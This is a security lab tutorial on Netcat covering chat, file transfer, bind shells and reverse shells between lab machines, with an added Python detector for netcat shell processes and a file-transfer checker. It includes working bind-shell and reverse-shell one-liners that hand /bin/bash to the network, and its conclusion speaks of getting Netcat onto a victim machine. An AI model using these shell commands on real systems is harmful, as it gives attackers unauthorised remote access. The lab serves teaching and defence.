Introduction to using Netcat


Objectives

To learn the basic features of Netcat that are used in the security field.

Introduction:

Netcat is a wonderfully versatile tool which has been dubbed the hackers' Swiss army knife. Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP; this dual functionality suggests that Netcat runs in two modes: client and server. Netcat is designed to be a dependable back end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection you would need and has a number of built-in capabilities. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Major features of Netcat are:

- Outbound or inbound connections, TCP or UDP, to or from any ports
- Full DNS forward/reverse checking, with appropriate warnings
- Ability to use any local source port
- Ability to use any locally-configured network source address
- Built-in port-scanning capabilities, with randomization
- Built-in loose source-routing capability
- Can read command line arguments from standard input
- Hex dump of transmitted and received data
- Optional ability to let another program service established connections
- Optional telnet-options responder
- Featured tunneling mode which also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel)

Lab Experiment

Requirements:

This lab needs two machines: the first runs BackTrack 3 and the other runs Windows XP.

Procedures:

Part 1: Listening on a TCP/UDP port with Netcat

Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications, or otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat using Netcat.

1. From BackTrack: we want to listen on port 4444 and accept incoming connections on this port. Type:

    nc -lvvp 4444

   Check that port 4444 is indeed listening using netstat. You will see:

    listening on [any] 4444...

2. From Windows XP: connect to port 4444 on your BackTrack machine by typing:

    nc -vv 10.10.136.85 4444

3. After the connection is established we can start the chat, as shown in Figures 1 and 2.

Figure 1: BackTrack Netcat listening on port 4444; the chat is opened after the connection is established

Figure 2: Windows XP establishes a connection with BackTrack, then a simple chat takes place

Part 2: Transferring files with Netcat

Netcat can also be used to transfer files from one computer to another. This applies to text and binary files. In order to send a file from Computer 2 to Computer 1, try the following:

1. From BackTrack: we'll set up Netcat to listen for and accept the connection and to redirect any input into a file. Type:

    nc -lvp 4444 > output.txt

2. On the Windows machine we create the text file secu.txt; then we connect to the listening Netcat on Computer 1 (port 4444) and send the file. Type:

    C:\>nc -vv 192.168.129.1 4444 < secu.txt

3. The connection will be established and the file will be transferred to BackTrack, as shown in Figures 3 and 4.

Figure 3: BackTrack listens on port 4444 and accepts the incoming connection from Windows XP to transfer the file

Figure 4: Sending the file via the opened connection to BackTrack

4. From BackTrack: check that the file was transferred correctly, as shown in Figure 5. Type:

    cat output.txt

Figure 5: Checking that the file was transferred correctly

Part 3: Remote Administration with Netcat

One of Netcat's neat features is command redirection. This means that Netcat can take an exe file and redirect its input, output and error messages to a TCP/UDP port, rather than to the default console. Take for example the cmd.exe executable. By redirecting stdin/stdout/stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer.

Bind Shell

1. From BackTrack: type the following, so that anyone connecting to port 4444 on this machine will be presented with a command prompt, with the permissions that nc was run with, as shown in Figure 6.

    nc -lvvp 4444 -e /bin/bash

Figure 6: Bind shell; anyone who tries to connect will be presented with a command line

2. From Windows: type the following to connect to the other machine that is listening on port 4444, as illustrated in Figure 7.

    nc -v 10.10.36.144 4444

   After the connection is established you will be presented with the shell of BackTrack. Now we can use any available command as if we were in front of the remote PC (for example, try ifconfig as shown in figure xxxxx). Remember that ifconfig is used only by Linux, which means we can be sure that we are remotely administering BackTrack through its shell.

Figure 7: After connection; trying ifconfig on the victim machine

Reverse shell

Another interesting Netcat feature is the ability to send a command shell to a listening host. So in this situation, although Alice cannot bind a port to cmd.exe locally on her computer and expect Bob to connect, she can send her command prompt to Bob's machine.

1. From Windows: type the following; Windows is now listening on port 5555 and waiting for an incoming connection.

    nc -lvvp 5555

2. From BackTrack: type the following; you now connect to the Windows machine and send your shell (the BackTrack shell) to it.

    nc -v 10.10.36.145 5555 -e /bin/bash

3. After the connection is established we can use BackTrack commands:

First I try an unrecognized command, and a BackTrack error message appears; then I try ifconfig, which gives me the IP of BackTrack. Figures 8 and 9 show this process before the connection and after the connection is reversed, with the command line of BackTrack and simple command execution from the remote computer that runs Windows XP.

Figure 8: Windows XP waits for a connection on port 5555; after the connection is established the shell of BackTrack is reversed to XP

Figure 9: BackTrack reverses its shell over the connection.
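For the defender's side of Part 3, the following added example (not part of the original lab) classifies netcat command lines from a process listing by role, so that a plain listener as in Part 1 is told apart from a listener or client started with -e. The names classify, flag_shells and SAMPLE_PS are hypothetical, only traditional netcat short options are parsed, and the process list is constructed for the example.

```python
import os

# Names netcat is commonly installed under (assumption; a renamed binary will not match).
NC_NAMES = {"nc", "netcat", "nc.traditional", "nc.exe"}
# Traditional netcat options that take a value, attached ("-p4444") or separate ("-p 4444").
VALUE_OPTS = set("cegGiopqsw")

def classify(cmdline):
    """Return role, program, peer and port for a netcat command line, or None if not netcat."""
    argv = cmdline.split()
    if not argv or os.path.basename(argv[0].replace("\\", "/")).lower() not in NC_NAMES:
        return None
    flags, values, positional = set(), {}, []
    args = iter(argv[1:])
    for arg in args:
        if len(arg) < 2 or not arg.startswith("-"):
            positional.append(arg)          # host or port
            continue
        for i, ch in enumerate(arg[1:], start=1):
            if ch in VALUE_OPTS:            # value is the rest of the token or the next token
                values[ch] = arg[i + 1:] or next(args, "")
                break
            flags.add(ch)
    program = values.get("e") or values.get("c")   # program wired to the socket
    listening = "l" in flags
    role = {(True, True): "bind-shell", (True, False): "reverse-shell",
            (False, True): "listener", (False, False): "client"}[bool(program), listening]
    port = (listening and values.get("p")) or (positional[-1] if positional else None)
    peer = positional[0] if positional and not listening else None
    return {"role": role, "program": program, "peer": peer, "port": port}

def flag_shells(ps_lines):
    """Return (pid, finding) for every netcat process started with -e or -c."""
    hits = []
    for line in ps_lines:
        pid, _, cmdline = line.strip().partition(" ")
        finding = classify(cmdline)
        if finding and finding["program"]:
            hits.append((int(pid), finding))
    return hits

# Constructed sample in the shape of `ps -eo pid,args` output; not captured from a real host.
SAMPLE_PS = [
    "  812 /usr/sbin/sshd -D",
    " 2291 nc -lvvp 4444",
    " 2310 nc -lvvp 4444 -e /bin/bash",
    " 2377 /bin/nc -v 10.10.36.145 5555 -e /bin/bash",
    " 2402 nc -vv 10.10.136.85 4444",
]
```

Calling flag_shells(SAMPLE_PS) reports only the two processes that hand /bin/bash to the network; the plain listener and the chat client are classified but not flagged.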

Conclusion:

Netcat has other nice features and uses, such as simple sniffing abilities, port redirection and others, which you can learn about if you are interested. Now, how do I get Netcat to run on the victim machine without remote user intervention? The answer to this question is simply remote code execution. Ninety percent of attack vectors can be summarized with the pair of words "code execution". For example, attacks such as buffer overflows, SQL injection, file inclusion, client-side attacks and Trojan horses all aim to result in code execution on the victim machine. A simple use of this will be presented in the virus and Trojan experiments.
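Part 2 checks the transferred file by reading it with cat, which says little about a binary file or one whose connection dropped early, since a raw TCP copy carries no length or checksum. The following added example (not part of the original lab) reproduces the listener and sender roles over loopback in Python and compares size and SHA-256 on both ends; the function names, file names and the cut_after parameter are hypothetical, and the input file is constructed.

```python
import hashlib
import os
import socket
import tempfile
import threading

def receive(listener, out_path, result):
    """Listener side, like `nc -l -p PORT > file`: write bytes until the peer closes."""
    conn, _ = listener.accept()
    digest, size = hashlib.sha256(), 0
    with conn, open(out_path, "wb") as out:
        while chunk := conn.recv(65536):
            out.write(chunk)
            digest.update(chunk)
            size += len(chunk)
    result.update(size=size, sha256=digest.hexdigest())

def send(port, path, cut_after=None):
    """Sender side, like `nc HOST PORT < file`; cut_after simulates a dropped connection."""
    with open(path, "rb") as src:
        data = src.read()
    with socket.create_connection(("127.0.0.1", port), timeout=5) as conn:
        conn.sendall(data[:cut_after])
    # What the sender would share out of band: size and SHA-256 of the original file.
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}

def transfer_and_verify(src_path, dst_path, cut_after=None):
    """Copy src_path to dst_path over loopback TCP and compare both ends."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
        listener.listen(1)
        received = {}
        worker = threading.Thread(target=receive, args=(listener, dst_path, received))
        worker.start()
        sent = send(listener.getsockname()[1], src_path, cut_after)
        worker.join(timeout=5)
    return {"intact": sent == received, "sent": sent, "received": received}

def demo():
    """Constructed input: a small binary file, sent once whole and once cut short."""
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = os.path.join(tmp, "secu.bin"), os.path.join(tmp, "output.bin")
        with open(src, "wb") as f:
            f.write(bytes(range(256)) * 64)  # 16384 bytes, including NUL and non-text bytes
        return transfer_and_verify(src, dst), transfer_and_verify(src, dst, cut_after=10000)
```

With real netcat the same check is done by hashing the file on each machine and comparing the two digests by hand.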